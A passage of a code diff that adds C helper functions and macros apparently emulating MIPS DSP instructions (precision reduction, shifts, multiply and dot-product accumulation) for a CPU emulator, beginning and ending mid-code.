MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); +} + +target_ulong helper_precrq_pw_l(target_ulong rs, target_ulong rt) +{ + uint32_t tempB, tempA; + + tempB = (rs >> 32) & MIPSDSP_LLO; + tempA = (rt >> 32) & MIPSDSP_LLO; + + return MIPSDSP_RETURN64_32(tempB, tempA); +} +#endif + +target_ulong helper_precrqu_s_qb_ph(target_ulong rs, target_ulong rt, + CPUMIPSState *env) +{ + uint8_t tempD, tempC, tempB, tempA; + uint16_t rsh, rsl, rth, rtl; + + rsh = (rs & MIPSDSP_HI) >> 16; + rsl = rs & MIPSDSP_LO; + rth = (rt & MIPSDSP_HI) >> 16; + rtl = rt & MIPSDSP_LO; + + tempD = mipsdsp_sat8_reduce_precision(rsh, env); + tempC = mipsdsp_sat8_reduce_precision(rsl, env); + tempB = mipsdsp_sat8_reduce_precision(rth, env); + tempA = mipsdsp_sat8_reduce_precision(rtl, env); + + return MIPSDSP_RETURN32_8(tempD, tempC, tempB, tempA); +} + +#if defined(TARGET_MIPS64) +target_ulong helper_precrqu_s_ob_qh(target_ulong rs, target_ulong rt, + CPUMIPSState *env) +{ + int i; + uint16_t rs3, rs2, rs1, rs0; + uint16_t rt3, rt2, rt1, rt0; + uint8_t temp[8]; + uint64_t result; + + result = 0; + + MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); + MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); + + temp[7] = mipsdsp_sat8_reduce_precision(rs3, env); + temp[6] = mipsdsp_sat8_reduce_precision(rs2, env); + temp[5] = mipsdsp_sat8_reduce_precision(rs1, env); + temp[4] = mipsdsp_sat8_reduce_precision(rs0, env); + temp[3] = mipsdsp_sat8_reduce_precision(rt3, env); + temp[2] = mipsdsp_sat8_reduce_precision(rt2, env); + temp[1] = mipsdsp_sat8_reduce_precision(rt1, env); + temp[0] = mipsdsp_sat8_reduce_precision(rt0, env); + + for (i = 0; i < 8; i++) { + result |= (uint64_t)temp[i] << (8 * i); + } + + return result; +} + +#define PRECEQ_PW(name, a, b) \ +target_ulong helper_preceq_pw_##name(target_ulong rt) \ +{ \ + uint16_t tempB, tempA; \ + uint32_t tempBI, tempAI; \ + \ + tempB = (rt >> a) & MIPSDSP_LO; \ + tempA = (rt >> b) & MIPSDSP_LO; \ + \ + tempBI = (uint32_t)tempB << 16; \ + tempAI = (uint32_t)tempA << 
16; \ + \ + return MIPSDSP_RETURN64_32(tempBI, tempAI); \ +} + +PRECEQ_PW(qhl, 48, 32); +PRECEQ_PW(qhr, 16, 0); +PRECEQ_PW(qhla, 48, 16); +PRECEQ_PW(qhra, 32, 0); + +#undef PRECEQ_PW + +#endif + +#define PRECEQU_PH(name, a, b) \ +target_ulong helper_precequ_ph_##name(target_ulong rt) \ +{ \ + uint16_t tempB, tempA; \ + \ + tempB = (rt >> a) & MIPSDSP_Q0; \ + tempA = (rt >> b) & MIPSDSP_Q0; \ + \ + tempB = tempB << 7; \ + tempA = tempA << 7; \ + \ + return MIPSDSP_RETURN32_16(tempB, tempA); \ +} + +PRECEQU_PH(qbl, 24, 16); +PRECEQU_PH(qbr, 8, 0); +PRECEQU_PH(qbla, 24, 8); +PRECEQU_PH(qbra, 16, 0); + +#undef PRECEQU_PH + +#if defined(TARGET_MIPS64) +#define PRECEQU_QH(name, a, b, c, d) \ +target_ulong helper_precequ_qh_##name(target_ulong rt) \ +{ \ + uint16_t tempD, tempC, tempB, tempA; \ + \ + tempD = (rt >> a) & MIPSDSP_Q0; \ + tempC = (rt >> b) & MIPSDSP_Q0; \ + tempB = (rt >> c) & MIPSDSP_Q0; \ + tempA = (rt >> d) & MIPSDSP_Q0; \ + \ + tempD = tempD << 7; \ + tempC = tempC << 7; \ + tempB = tempB << 7; \ + tempA = tempA << 7; \ + \ + return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ +} + +PRECEQU_QH(obl, 56, 48, 40, 32); +PRECEQU_QH(obr, 24, 16, 8, 0); +PRECEQU_QH(obla, 56, 40, 24, 8); +PRECEQU_QH(obra, 48, 32, 16, 0); + +#undef PRECEQU_QH + +#endif + +#define PRECEU_PH(name, a, b) \ +target_ulong helper_preceu_ph_##name(target_ulong rt) \ +{ \ + uint16_t tempB, tempA; \ + \ + tempB = (rt >> a) & MIPSDSP_Q0; \ + tempA = (rt >> b) & MIPSDSP_Q0; \ + \ + return MIPSDSP_RETURN32_16(tempB, tempA); \ +} + +PRECEU_PH(qbl, 24, 16); +PRECEU_PH(qbr, 8, 0); +PRECEU_PH(qbla, 24, 8); +PRECEU_PH(qbra, 16, 0); + +#undef PRECEU_PH + +#if defined(TARGET_MIPS64) +#define PRECEU_QH(name, a, b, c, d) \ +target_ulong helper_preceu_qh_##name(target_ulong rt) \ +{ \ + uint16_t tempD, tempC, tempB, tempA; \ + \ + tempD = (rt >> a) & MIPSDSP_Q0; \ + tempC = (rt >> b) & MIPSDSP_Q0; \ + tempB = (rt >> c) & MIPSDSP_Q0; \ + tempA = (rt >> d) & MIPSDSP_Q0; \ + \ + return 
MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ +} + +PRECEU_QH(obl, 56, 48, 40, 32); +PRECEU_QH(obr, 24, 16, 8, 0); +PRECEU_QH(obla, 56, 40, 24, 8); +PRECEU_QH(obra, 48, 32, 16, 0); + +#undef PRECEU_QH + +#endif + +/** DSP GPR-Based Shift Sub-class insns **/ +#define SHIFT_QB(name, func) \ +target_ulong helper_##name##_qb(target_ulong sa, target_ulong rt) \ +{ \ + uint8_t rt3, rt2, rt1, rt0; \ + \ + sa = sa & 0x07; \ + \ + MIPSDSP_SPLIT32_8(rt, rt3, rt2, rt1, rt0); \ + \ + rt3 = mipsdsp_##func(rt3, sa); \ + rt2 = mipsdsp_##func(rt2, sa); \ + rt1 = mipsdsp_##func(rt1, sa); \ + rt0 = mipsdsp_##func(rt0, sa); \ + \ + return MIPSDSP_RETURN32_8(rt3, rt2, rt1, rt0); \ +} + +#define SHIFT_QB_ENV(name, func) \ +target_ulong helper_##name##_qb(target_ulong sa, target_ulong rt,\ + CPUMIPSState *env) \ +{ \ + uint8_t rt3, rt2, rt1, rt0; \ + \ + sa = sa & 0x07; \ + \ + MIPSDSP_SPLIT32_8(rt, rt3, rt2, rt1, rt0); \ + \ + rt3 = mipsdsp_##func(rt3, sa, env); \ + rt2 = mipsdsp_##func(rt2, sa, env); \ + rt1 = mipsdsp_##func(rt1, sa, env); \ + rt0 = mipsdsp_##func(rt0, sa, env); \ + \ + return MIPSDSP_RETURN32_8(rt3, rt2, rt1, rt0); \ +} + +SHIFT_QB_ENV(shll, lshift8); +SHIFT_QB(shrl, rshift_u8); + +SHIFT_QB(shra, rashift8); +SHIFT_QB(shra_r, rnd8_rashift); + +#undef SHIFT_QB +#undef SHIFT_QB_ENV + +#if defined(TARGET_MIPS64) +#define SHIFT_OB(name, func) \ +target_ulong helper_##name##_ob(target_ulong rt, target_ulong sa) \ +{ \ + int i; \ + uint8_t rt_t[8]; \ + uint64_t temp; \ + \ + sa = sa & 0x07; \ + temp = 0; \ + \ + for (i = 0; i < 8; i++) { \ + rt_t[i] = (rt >> (8 * i)) & MIPSDSP_Q0; \ + rt_t[i] = mipsdsp_##func(rt_t[i], sa); \ + temp |= (uint64_t)rt_t[i] << (8 * i); \ + } \ + \ + return temp; \ +} + +#define SHIFT_OB_ENV(name, func) \ +target_ulong helper_##name##_ob(target_ulong rt, target_ulong sa, \ + CPUMIPSState *env) \ +{ \ + int i; \ + uint8_t rt_t[8]; \ + uint64_t temp; \ + \ + sa = sa & 0x07; \ + temp = 0; \ + \ + for (i = 0; i < 8; i++) { \ + rt_t[i] = (rt >> 
(8 * i)) & MIPSDSP_Q0; \ + rt_t[i] = mipsdsp_##func(rt_t[i], sa, env); \ + temp |= (uint64_t)rt_t[i] << (8 * i); \ + } \ + \ + return temp; \ +} + +SHIFT_OB_ENV(shll, lshift8); +SHIFT_OB(shrl, rshift_u8); + +SHIFT_OB(shra, rashift8); +SHIFT_OB(shra_r, rnd8_rashift); + +#undef SHIFT_OB +#undef SHIFT_OB_ENV + +#endif + +#define SHIFT_PH(name, func) \ +target_ulong helper_##name##_ph(target_ulong sa, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + uint16_t rth, rtl; \ + \ + sa = sa & 0x0F; \ + \ + MIPSDSP_SPLIT32_16(rt, rth, rtl); \ + \ + rth = mipsdsp_##func(rth, sa, env); \ + rtl = mipsdsp_##func(rtl, sa, env); \ + \ + return MIPSDSP_RETURN32_16(rth, rtl); \ +} + +SHIFT_PH(shll, lshift16); +SHIFT_PH(shll_s, sat16_lshift); + +#undef SHIFT_PH + +#if defined(TARGET_MIPS64) +#define SHIFT_QH(name, func) \ +target_ulong helper_##name##_qh(target_ulong rt, target_ulong sa) \ +{ \ + uint16_t rt3, rt2, rt1, rt0; \ + \ + sa = sa & 0x0F; \ + \ + MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \ + \ + rt3 = mipsdsp_##func(rt3, sa); \ + rt2 = mipsdsp_##func(rt2, sa); \ + rt1 = mipsdsp_##func(rt1, sa); \ + rt0 = mipsdsp_##func(rt0, sa); \ + \ + return MIPSDSP_RETURN64_16(rt3, rt2, rt1, rt0); \ +} + +#define SHIFT_QH_ENV(name, func) \ +target_ulong helper_##name##_qh(target_ulong rt, target_ulong sa, \ + CPUMIPSState *env) \ +{ \ + uint16_t rt3, rt2, rt1, rt0; \ + \ + sa = sa & 0x0F; \ + \ + MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \ + \ + rt3 = mipsdsp_##func(rt3, sa, env); \ + rt2 = mipsdsp_##func(rt2, sa, env); \ + rt1 = mipsdsp_##func(rt1, sa, env); \ + rt0 = mipsdsp_##func(rt0, sa, env); \ + \ + return MIPSDSP_RETURN64_16(rt3, rt2, rt1, rt0); \ +} + +SHIFT_QH_ENV(shll, lshift16); +SHIFT_QH_ENV(shll_s, sat16_lshift); + +SHIFT_QH(shrl, rshift_u16); +SHIFT_QH(shra, rashift16); +SHIFT_QH(shra_r, rnd16_rashift); + +#undef SHIFT_QH +#undef SHIFT_QH_ENV + +#endif + +#define SHIFT_W(name, func) \ +target_ulong helper_##name##_w(target_ulong sa, target_ulong rt) \ +{ \ + uint32_t 
temp; \ + \ + sa = sa & 0x1F; \ + temp = mipsdsp_##func(rt, sa); \ + \ + return (target_long)(int32_t)temp; \ +} + +#define SHIFT_W_ENV(name, func) \ +target_ulong helper_##name##_w(target_ulong sa, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + uint32_t temp; \ + \ + sa = sa & 0x1F; \ + temp = mipsdsp_##func(rt, sa, env); \ + \ + return (target_long)(int32_t)temp; \ +} + +SHIFT_W_ENV(shll_s, sat32_lshift); +SHIFT_W(shra_r, rnd32_rashift); + +#undef SHIFT_W +#undef SHIFT_W_ENV + +#if defined(TARGET_MIPS64) +#define SHIFT_PW(name, func) \ +target_ulong helper_##name##_pw(target_ulong rt, target_ulong sa) \ +{ \ + uint32_t rt1, rt0; \ + \ + sa = sa & 0x1F; \ + MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ + \ + rt1 = mipsdsp_##func(rt1, sa); \ + rt0 = mipsdsp_##func(rt0, sa); \ + \ + return MIPSDSP_RETURN64_32(rt1, rt0); \ +} + +#define SHIFT_PW_ENV(name, func) \ +target_ulong helper_##name##_pw(target_ulong rt, target_ulong sa, \ + CPUMIPSState *env) \ +{ \ + uint32_t rt1, rt0; \ + \ + sa = sa & 0x1F; \ + MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ + \ + rt1 = mipsdsp_##func(rt1, sa, env); \ + rt0 = mipsdsp_##func(rt0, sa, env); \ + \ + return MIPSDSP_RETURN64_32(rt1, rt0); \ +} + +SHIFT_PW_ENV(shll, lshift32); +SHIFT_PW_ENV(shll_s, sat32_lshift); + +SHIFT_PW(shra, rashift32); +SHIFT_PW(shra_r, rnd32_rashift); + +#undef SHIFT_PW +#undef SHIFT_PW_ENV + +#endif + +#define SHIFT_PH(name, func) \ +target_ulong helper_##name##_ph(target_ulong sa, target_ulong rt) \ +{ \ + uint16_t rth, rtl; \ + \ + sa = sa & 0x0F; \ + \ + MIPSDSP_SPLIT32_16(rt, rth, rtl); \ + \ + rth = mipsdsp_##func(rth, sa); \ + rtl = mipsdsp_##func(rtl, sa); \ + \ + return MIPSDSP_RETURN32_16(rth, rtl); \ +} + +SHIFT_PH(shrl, rshift_u16); +SHIFT_PH(shra, rashift16); +SHIFT_PH(shra_r, rnd16_rashift); + +#undef SHIFT_PH + +/** DSP Multiply Sub-class insns **/ +/* Return value made up by two 16bits value. + * FIXME give the macro a better name. 
+ */ +#define MUL_RETURN32_16_PH(name, func, \ + rsmov1, rsmov2, rsfilter, \ + rtmov1, rtmov2, rtfilter) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + uint16_t rsB, rsA, rtB, rtA; \ + \ + rsB = (rs >> rsmov1) & rsfilter; \ + rsA = (rs >> rsmov2) & rsfilter; \ + rtB = (rt >> rtmov1) & rtfilter; \ + rtA = (rt >> rtmov2) & rtfilter; \ + \ + rsB = mipsdsp_##func(rsB, rtB, env); \ + rsA = mipsdsp_##func(rsA, rtA, env); \ + \ + return MIPSDSP_RETURN32_16(rsB, rsA); \ +} + +MUL_RETURN32_16_PH(muleu_s_ph_qbl, mul_u8_u16, \ + 24, 16, MIPSDSP_Q0, \ + 16, 0, MIPSDSP_LO); +MUL_RETURN32_16_PH(muleu_s_ph_qbr, mul_u8_u16, \ + 8, 0, MIPSDSP_Q0, \ + 16, 0, MIPSDSP_LO); +MUL_RETURN32_16_PH(mulq_rs_ph, rndq15_mul_q15_q15, \ + 16, 0, MIPSDSP_LO, \ + 16, 0, MIPSDSP_LO); +MUL_RETURN32_16_PH(mul_ph, mul_i16_i16, \ + 16, 0, MIPSDSP_LO, \ + 16, 0, MIPSDSP_LO); +MUL_RETURN32_16_PH(mul_s_ph, sat16_mul_i16_i16, \ + 16, 0, MIPSDSP_LO, \ + 16, 0, MIPSDSP_LO); +MUL_RETURN32_16_PH(mulq_s_ph, sat16_mul_q15_q15, \ + 16, 0, MIPSDSP_LO, \ + 16, 0, MIPSDSP_LO); + +#undef MUL_RETURN32_16_PH + +#define MUL_RETURN32_32_ph(name, func, movbits) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int16_t rsh, rth; \ + int32_t temp; \ + \ + rsh = (rs >> movbits) & MIPSDSP_LO; \ + rth = (rt >> movbits) & MIPSDSP_LO; \ + temp = mipsdsp_##func(rsh, rth, env); \ + \ + return (target_long)(int32_t)temp; \ +} + +MUL_RETURN32_32_ph(muleq_s_w_phl, mul_q15_q15_overflowflag21, 16); +MUL_RETURN32_32_ph(muleq_s_w_phr, mul_q15_q15_overflowflag21, 0); + +#undef MUL_RETURN32_32_ph + +#define MUL_VOID_PH(name, use_ac_env) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int16_t rsh, rsl, rth, rtl; \ + int32_t tempB, tempA; \ + int64_t acc, dotp; \ + \ + MIPSDSP_SPLIT32_16(rs, rsh, rsl); \ + MIPSDSP_SPLIT32_16(rt, rth, rtl); \ + \ + if (use_ac_env == 1) { \ + tempB = 
mipsdsp_mul_q15_q15(ac, rsh, rth, env); \ + tempA = mipsdsp_mul_q15_q15(ac, rsl, rtl, env); \ + } else { \ + tempB = mipsdsp_mul_u16_u16(rsh, rth); \ + tempA = mipsdsp_mul_u16_u16(rsl, rtl); \ + } \ + \ + dotp = (int64_t)tempB - (int64_t)tempA; \ + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ + dotp = dotp + acc; \ + env->active_tc.HI[ac] = (target_long)(int32_t) \ + ((dotp & MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t)(dotp & MIPSDSP_LLO); \ +} + +MUL_VOID_PH(mulsaq_s_w_ph, 1); +MUL_VOID_PH(mulsa_w_ph, 0); + +#undef MUL_VOID_PH + +#if defined(TARGET_MIPS64) +#define MUL_RETURN64_16_QH(name, func, \ + rsmov1, rsmov2, rsmov3, rsmov4, rsfilter, \ + rtmov1, rtmov2, rtmov3, rtmov4, rtfilter) \ +target_ulong helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + uint16_t rs3, rs2, rs1, rs0; \ + uint16_t rt3, rt2, rt1, rt0; \ + uint16_t tempD, tempC, tempB, tempA; \ + \ + rs3 = (rs >> rsmov1) & rsfilter; \ + rs2 = (rs >> rsmov2) & rsfilter; \ + rs1 = (rs >> rsmov3) & rsfilter; \ + rs0 = (rs >> rsmov4) & rsfilter; \ + rt3 = (rt >> rtmov1) & rtfilter; \ + rt2 = (rt >> rtmov2) & rtfilter; \ + rt1 = (rt >> rtmov3) & rtfilter; \ + rt0 = (rt >> rtmov4) & rtfilter; \ + \ + tempD = mipsdsp_##func(rs3, rt3, env); \ + tempC = mipsdsp_##func(rs2, rt2, env); \ + tempB = mipsdsp_##func(rs1, rt1, env); \ + tempA = mipsdsp_##func(rs0, rt0, env); \ + \ + return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ +} + +MUL_RETURN64_16_QH(muleu_s_qh_obl, mul_u8_u16, \ + 56, 48, 40, 32, MIPSDSP_Q0, \ + 48, 32, 16, 0, MIPSDSP_LO); +MUL_RETURN64_16_QH(muleu_s_qh_obr, mul_u8_u16, \ + 24, 16, 8, 0, MIPSDSP_Q0, \ + 48, 32, 16, 0, MIPSDSP_LO); +MUL_RETURN64_16_QH(mulq_rs_qh, rndq15_mul_q15_q15, \ + 48, 32, 16, 0, MIPSDSP_LO, \ + 48, 32, 16, 0, MIPSDSP_LO); + +#undef MUL_RETURN64_16_QH + +#define MUL_RETURN64_32_QH(name, \ + rsmov1, rsmov2, \ + rtmov1, rtmov2) \ +target_ulong 
helper_##name(target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + uint16_t rsB, rsA; \ + uint16_t rtB, rtA; \ + uint32_t tempB, tempA; \ + \ + rsB = (rs >> rsmov1) & MIPSDSP_LO; \ + rsA = (rs >> rsmov2) & MIPSDSP_LO; \ + rtB = (rt >> rtmov1) & MIPSDSP_LO; \ + rtA = (rt >> rtmov2) & MIPSDSP_LO; \ + \ + tempB = mipsdsp_mul_q15_q15(5, rsB, rtB, env); \ + tempA = mipsdsp_mul_q15_q15(5, rsA, rtA, env); \ + \ + return ((uint64_t)tempB << 32) | (uint64_t)tempA; \ +} + +MUL_RETURN64_32_QH(muleq_s_pw_qhl, 48, 32, 48, 32); +MUL_RETURN64_32_QH(muleq_s_pw_qhr, 16, 0, 16, 0); + +#undef MUL_RETURN64_32_QH + +void helper_mulsaq_s_w_qh(target_ulong rs, target_ulong rt, uint32_t ac, + CPUMIPSState *env) +{ + int16_t rs3, rs2, rs1, rs0; + int16_t rt3, rt2, rt1, rt0; + int32_t tempD, tempC, tempB, tempA; + int64_t acc[2]; + int64_t temp[2]; + int64_t temp_sum; + + MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); + MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); + + tempD = mipsdsp_mul_q15_q15(ac, rs3, rt3, env); + tempC = mipsdsp_mul_q15_q15(ac, rs2, rt2, env); + tempB = mipsdsp_mul_q15_q15(ac, rs1, rt1, env); + tempA = mipsdsp_mul_q15_q15(ac, rs0, rt0, env); + + temp[0] = ((int32_t)tempD - (int32_t)tempC) + + ((int32_t)tempB - (int32_t)tempA); + temp[0] = (int64_t)(temp[0] << 30) >> 30; + if (((temp[0] >> 33) & 0x01) == 0) { + temp[1] = 0x00; + } else { + temp[1] = ~0ull; + } + + acc[0] = env->active_tc.LO[ac]; + acc[1] = env->active_tc.HI[ac]; + + temp_sum = acc[0] + temp[0]; + if (((uint64_t)temp_sum < (uint64_t)acc[0]) && + ((uint64_t)temp_sum < (uint64_t)temp[0])) { + acc[1] += 1; + } + acc[0] = temp_sum; + acc[1] += temp[1]; + + env->active_tc.HI[ac] = acc[1]; + env->active_tc.LO[ac] = acc[0]; +} +#endif + +#define DP_QB(name, func, is_add, rsmov1, rsmov2, rtmov1, rtmov2) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + uint8_t rs3, rs2; \ + uint8_t rt3, rt2; \ + uint16_t tempB, tempA; \ + uint64_t tempC, dotp; \ + \ + 
rs3 = (rs >> rsmov1) & MIPSDSP_Q0; \ + rs2 = (rs >> rsmov2) & MIPSDSP_Q0; \ + rt3 = (rt >> rtmov1) & MIPSDSP_Q0; \ + rt2 = (rt >> rtmov2) & MIPSDSP_Q0; \ + tempB = mipsdsp_##func(rs3, rt3); \ + tempA = mipsdsp_##func(rs2, rt2); \ + dotp = (int64_t)tempB + (int64_t)tempA; \ + if (is_add) { \ + tempC = (((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO)) \ + + dotp; \ + } else { \ + tempC = (((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO)) \ + - dotp; \ + } \ + \ + env->active_tc.HI[ac] = (target_long)(int32_t) \ + ((tempC & MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t)(tempC & MIPSDSP_LLO); \ +} + +DP_QB(dpau_h_qbl, mul_u8_u8, 1, 24, 16, 24, 16); +DP_QB(dpau_h_qbr, mul_u8_u8, 1, 8, 0, 8, 0); +DP_QB(dpsu_h_qbl, mul_u8_u8, 0, 24, 16, 24, 16); +DP_QB(dpsu_h_qbr, mul_u8_u8, 0, 8, 0, 8, 0); + +#undef DP_QB + +#if defined(TARGET_MIPS64) +#define DP_OB(name, add_sub, \ + rsmov1, rsmov2, rsmov3, rsmov4, \ + rtmov1, rtmov2, rtmov3, rtmov4) \ +void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ + CPUMIPSState *env) \ +{ \ + uint8_t rsD, rsC, rsB, rsA; \ + uint8_t rtD, rtC, rtB, rtA; \ + uint16_t tempD, tempC, tempB, tempA; \ + uint64_t temp[2]; \ + uint64_t acc[2]; \ + uint64_t temp_sum; \ + \ + temp[0] = 0; \ + temp[1] = 0; \ + \ + rsD = (rs >> rsmov1) & MIPSDSP_Q0; \ + rsC = (rs >> rsmov2) & MIPSDSP_Q0; \ + rsB = (rs >> rsmov3) & MIPSDSP_Q0; \ + rsA = (rs >> rsmov4) & MIPSDSP_Q0; \ + rtD = (rt >> rtmov1) & MIPSDSP_Q0; \ + rtC = (rt >> rtmov2) & MIPSDSP_Q0; \ + rtB = (rt >> rtmov3) & MIPSDSP_Q0; \ + rtA = (rt >> rtmov4) & MIPSDSP_Q0; \ + \ + tempD = mipsdsp_mul_u8_u8(rsD, rtD); \ + tempC = mipsdsp_mul_u8_u8(rsC, rtC); \ + tempB = mipsdsp_mul_u8_u8(rsB, rtB); \ + tempA = mipsdsp_mul_u8_u8(rsA, rtA); \ + \ + temp[0] = (uint64_t)tempD + (uint64_t)tempC + \ + (uint64_t)tempB + (uint64_t)tempA; \ + \ + acc[0] = env->active_tc.LO[ac]; \ + acc[1] = 
env->active_tc.HI[ac]; \ + \ + if (add_sub) { \ + temp_sum = acc[0] + temp[0]; \ + if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ + ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ + acc[1] += 1; \ + } \ + temp[0] = temp_sum; \ + temp[1] = acc[1] + temp[1]; \ + } else { \ + temp_sum = acc[0] - temp[0]; \ + if ((uint64_t)temp_sum > (uint64_t)acc[0]) { \ + acc[1] -= 1; \ + } \ + temp[0] = temp_sum; \ + temp[1] = acc[1] - temp[1]; \ + } \ + \ + env->active_tc.HI[ac] = temp[1]; \ + env->active_tc.LO[ac] = temp[0]; \ +} + +DP_OB(dpau_h_obl, 1, 56, 48, 40, 32, 56, 48, 40, 32); +DP_OB(dpau_h_obr, 1, 24, 16, 8, 0, 24, 16, 8, 0); +DP_OB(dpsu_h_obl, 0, 56, 48, 40, 32, 56, 48, 40, 32); +DP_OB(dpsu_h_obr, 0, 24, 16, 8, 0, 24, 16, 8, 0); + +#undef DP_OB +#endif + +#define DP_NOFUNC_PH(name, is_add, rsmov1, rsmov2, rtmov1, rtmov2) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int16_t rsB, rsA, rtB, rtA; \ + int32_t tempA, tempB; \ + int64_t acc; \ + \ + rsB = (rs >> rsmov1) & MIPSDSP_LO; \ + rsA = (rs >> rsmov2) & MIPSDSP_LO; \ + rtB = (rt >> rtmov1) & MIPSDSP_LO; \ + rtA = (rt >> rtmov2) & MIPSDSP_LO; \ + \ + tempB = (int32_t)rsB * (int32_t)rtB; \ + tempA = (int32_t)rsA * (int32_t)rtA; \ + \ + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ + \ + if (is_add) { \ + acc = acc + ((int64_t)tempB + (int64_t)tempA); \ + } else { \ + acc = acc - ((int64_t)tempB + (int64_t)tempA); \ + } \ + \ + env->active_tc.HI[ac] = (target_long)(int32_t)((acc & MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t)(acc & MIPSDSP_LLO); \ +} + +DP_NOFUNC_PH(dpa_w_ph, 1, 16, 0, 16, 0); +DP_NOFUNC_PH(dpax_w_ph, 1, 16, 0, 0, 16); +DP_NOFUNC_PH(dps_w_ph, 0, 16, 0, 16, 0); +DP_NOFUNC_PH(dpsx_w_ph, 0, 16, 0, 0, 16); +#undef DP_NOFUNC_PH + +#define DP_HASFUNC_PH(name, is_add, rsmov1, rsmov2, rtmov1, rtmov2) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + 
CPUMIPSState *env) \ +{ \ + int16_t rsB, rsA, rtB, rtA; \ + int32_t tempB, tempA; \ + int64_t acc, dotp; \ + \ + rsB = (rs >> rsmov1) & MIPSDSP_LO; \ + rsA = (rs >> rsmov2) & MIPSDSP_LO; \ + rtB = (rt >> rtmov1) & MIPSDSP_LO; \ + rtA = (rt >> rtmov2) & MIPSDSP_LO; \ + \ + tempB = mipsdsp_mul_q15_q15(ac, rsB, rtB, env); \ + tempA = mipsdsp_mul_q15_q15(ac, rsA, rtA, env); \ + \ + dotp = (int64_t)tempB + (int64_t)tempA; \ + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ + \ + if (is_add) { \ + acc = acc + dotp; \ + } else { \ + acc = acc - dotp; \ + } \ + \ + env->active_tc.HI[ac] = (target_long)(int32_t) \ + ((acc & MIPSDSP_LHI) >> 32); \ + env->active_tc.LO[ac] = (target_long)(int32_t) \ + (acc & MIPSDSP_LLO); \ +} + +DP_HASFUNC_PH(dpaq_s_w_ph, 1, 16, 0, 16, 0); +DP_HASFUNC_PH(dpaqx_s_w_ph, 1, 16, 0, 0, 16); +DP_HASFUNC_PH(dpsq_s_w_ph, 0, 16, 0, 16, 0); +DP_HASFUNC_PH(dpsqx_s_w_ph, 0, 16, 0, 0, 16); + +#undef DP_HASFUNC_PH + +#define DP_128OPERATION_PH(name, is_add) \ +void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ + CPUMIPSState *env) \ +{ \ + int16_t rsh, rsl, rth, rtl; \ + int32_t tempB, tempA, tempC62_31, tempC63; \ + int64_t acc, dotp, tempC; \ + \ + MIPSDSP_SPLIT32_16(rs, rsh, rsl); \ + MIPSDSP_SPLIT32_16(rt, rth, rtl); \ + \ + tempB = mipsdsp_mul_q15_q15(ac, rsh, rtl, env); \ + tempA = mipsdsp_mul_q15_q15(ac, rsl, rth, env); \ + \ + dotp = (int64_t)tempB + (int64_t)tempA; \ + acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ + ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ + if (is_add) { \ + tempC = acc + dotp; \ + } else { \ + tempC = acc - dotp; \ + } \ + tempC63 = (tempC >> 63) & 0x01; \ + tempC62_31 = (tempC >> 31) & 0xFFFFFFFF; \ + \ + if ((tempC63 == 0) && (tempC62_31 != 0x00000000)) { \ + tempC = 0x7FFFFFFF; \ + set_DSPControl_overflow_flag(1, 16 + ac, env); \ + } \ + \ + if ((tempC63 == 1) && (tempC62_31 != 0xFFFFFFFF)) { \ + tempC = (int64_t)(int32_t)0x80000000; \ + 
